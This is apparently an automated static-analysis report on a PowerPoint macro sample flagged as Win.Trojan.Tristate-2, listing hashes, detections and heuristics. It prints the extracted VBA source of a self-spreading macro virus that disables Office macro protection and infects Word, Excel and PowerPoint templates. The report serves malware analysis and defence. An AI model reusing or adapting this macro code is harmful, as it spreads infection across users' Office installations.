Win.Trojan.Tristate-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 642b54d677d4d412…

MALICIOUS

Office (OLE)

18.5 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 72be6ecab95387ab33c25de2bcdc23aa SHA-1: e03792905c3c0f8aa98ba6077afc7b3a53b3d808 SHA-256: 642b54d677d4d412fc86d81b2c010f7f7b6663d463bdd63eaafc991d32761f7d
220 Risk Score

Malware Insights

Win.Trojan.Tristate-2 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Win.Trojan.Tristate-2. It contains VBA macros that utilize CreateObject and GetObject, indicative of malicious activity. The macro code attempts to manipulate Office templates and potentially download additional payloads, as suggested by the truncated Excel object creation and file manipulation code.

Heuristics 4

  • ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Tristate-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10393 bytes
SHA-256: 14157d4982ca0b618c650f983bf47e171a5fa9077a60e379e07c0e843ae2f59d
Detection
ClamAV: Win.Trojan.Insert-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ďđĺäëîćĺíčĺ"
'<!--Ďđîăŕ-->
'Ďđĺäëîćĺíčĺ v0.01 /Ďđîăŕ
Private Sub Document_Close() ' Word
    On Error Resume Next
MsgBox "ÎÎÎ ""Ęóđńęěĺňŕëë""" & Chr(13) & "Çŕęóďŕĺň ëîě ÷¸đíűő ěĺňŕëëîâ." & Chr(13) & "Öĺíű ďđčĺěëĺěűĺ." & Chr(13) & "Íŕř ŕäđĺń: ďđ. Ęóëŕęîâŕ 109-ŕ, ňĺë./ôŕęń (0712) 32-00-42": Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--Ďđîăŕ-->" Then
        AD.deletelines 1, AD.CountOfLines
        AD.InsertLines 1, TT.Lines(1, TT.CountOfLines)
        If AD.Lines(1, 1) <> "'<!--Ďđîăŕ-->" Then
            AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
        End If
    End If
    If NT.Lines(1, 1) <> "'<!--Ďđîăŕ-->" Then
        NT.deletelines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Âňîđńűđüĺ.")) <> UCase("ÂŇÎĐŃŰĐÜĹ") Then
            'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
            'System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            'System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add
            Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Âňîđńűđüĺ."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Ďđĺäëîćĺíčĺ" Then dontadd = True
        Next
        If dontadd <> True Then
            'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            'System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
            'System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            Set NewMod = PBT.VBProject.VBComponents.Add(1)
            NewMod.Name = "Ďđĺäëîćĺíčĺ"
            NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
            Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "Ďđĺäëîćĺíčĺ"
                .ZOrder (1)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(1).Action = 8
                .ActionSettings(1).Run = "actionhook"
            End With
            Set NewMod = Nothing
            PBT.Save
        End If
        PBT.Close
        PPObj.Quit
    End If
    If TT.Lines(1, 1) <> "'<!--Ďđîăŕ-->" Then
        TT.deletelines 1, TT.CountOfLines
        TT.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
Private Sub Workbook_Deactivate() 'Excel
MsgBox "ÎÎÎ ""Ęóđńęěĺňŕëë""" & Chr(13) & "Çŕęóďŕĺň ëîě ÷¸đíűő ěĺňŕëëîâ." & Chr(13) & "Öĺíű ďđčĺěëĺěűĺ." & Chr(13) & "Íŕř ŕäđĺń: ďđ. Ęóëŕęîâŕ 109-ŕ, ňĺë./ôŕęń (0712) 32-00-42":    On Error Resume Next
    Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents("
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.